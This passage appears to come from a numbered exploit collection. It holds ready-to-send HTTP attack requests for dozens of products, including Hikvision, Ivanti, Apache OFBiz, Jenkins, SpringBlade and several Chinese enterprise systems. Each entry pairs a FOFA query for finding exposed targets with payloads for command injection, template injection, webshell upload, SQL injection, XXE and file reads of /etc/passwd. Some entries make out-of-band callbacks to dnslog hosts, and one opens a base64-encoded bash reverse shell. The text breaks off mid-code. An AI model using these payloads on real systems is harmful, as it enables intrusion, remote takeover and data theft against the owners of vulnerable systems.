User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普掌上校园服务管理平台 service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22服装管理软件系统 UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs 建设工程质量监督系统 FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE (百为) traffic-control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀软件 DesignReportSave.jsp arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The EXP request is as follows; it injects a Godzilla (哥斯拉) webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Result URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese tosei self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒明御安全网关 aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒明御安全网关 aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. 致远互联FE协作办公平台 editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. 海康威视 IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. 海康威视综合安防管理平台 orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. 海康威视运行管理中心 session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. 奇安信网神SecGate3600防火墙 app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. QiAnXin Legendsec (奇安信网神) SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

The uploaded file is then served from /attachements/ (the original listed the filename from entry 93 here; it must match the filename uploaded above):
GET /attachements/cciytdzu.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA: app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 Groovy remote code execution
FOFA: app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell: start a listener on Kali first:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 Shiro deserialization remote command execution
FOFA: body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA: app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA: app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA: icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA: body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA: body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
      <ds:SignedInfo>
        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
        <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
      </ds:SignedInfo>
      <ds:SignatureValue>qwerty</ds:SignatureValue>
      <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
        <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/>
        <ds:X509Data/>
      </ds:KeyInfo>
      <ds:Object></ds:Object>
    </ds:Signature>
  </soap:Body>
</soap:Envelope>

The RetrievalMethod URI is the address the server is made to fetch; a DNS/HTTP callback there confirms the SSRF.

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA: body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 of the following XML (the DOCTYPE declares an external parameter entity that the server resolves, which is what triggers the callback):
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. TOTOLINK T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA: title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA: body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
(The URL is truncated in the original.)

106. SpringBlade dict-biz/list SQL injection
FOFA: body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

Note that the injection sits in the parameter name, not in a value.

107. SpringBlade tenant/list SQL injection
FOFA: body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA: "dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA: header="X-Jenkins"
The CLI over HTTP uses two correlated requests sharing a Session id: an upload side that sends the command frames and a download side that receives the output.
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

The download side returns the file's lines inside the command's error text:
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
 [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

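The body of the upload request above is the Jenkins plain CLI framing: a 4-byte big-endian length, a 1-byte opcode (0 = ARG, 1 = LOCALE, 2 = ENCODING, 3 = START, exactly as the POC bytes show) and a Java writeUTF string (2-byte length plus UTF-8). The Python below is an added example, not code from this page or from Jenkins: it encodes and decodes those frames and pulls out the @file arguments, which the args4j parser expands into file contents and which is what turns a harmless `help` into a file read. The opcode table is read off the POC bytes; file_read_args is this example's own helper.

```python
import struct

# Opcodes of the Jenkins plain CLI protocol, in ordinal order (as seen in the POC bytes).
OPS = {"ARG": 0, "LOCALE": 1, "ENCODING": 2, "START": 3}
OP_NAMES = {v: k for k, v in OPS.items()}

# Constructed sample: the exact upload body of the POC above.
POC_BODY = (
    b"\x00\x00\x00\x06\x00\x00\x04help"
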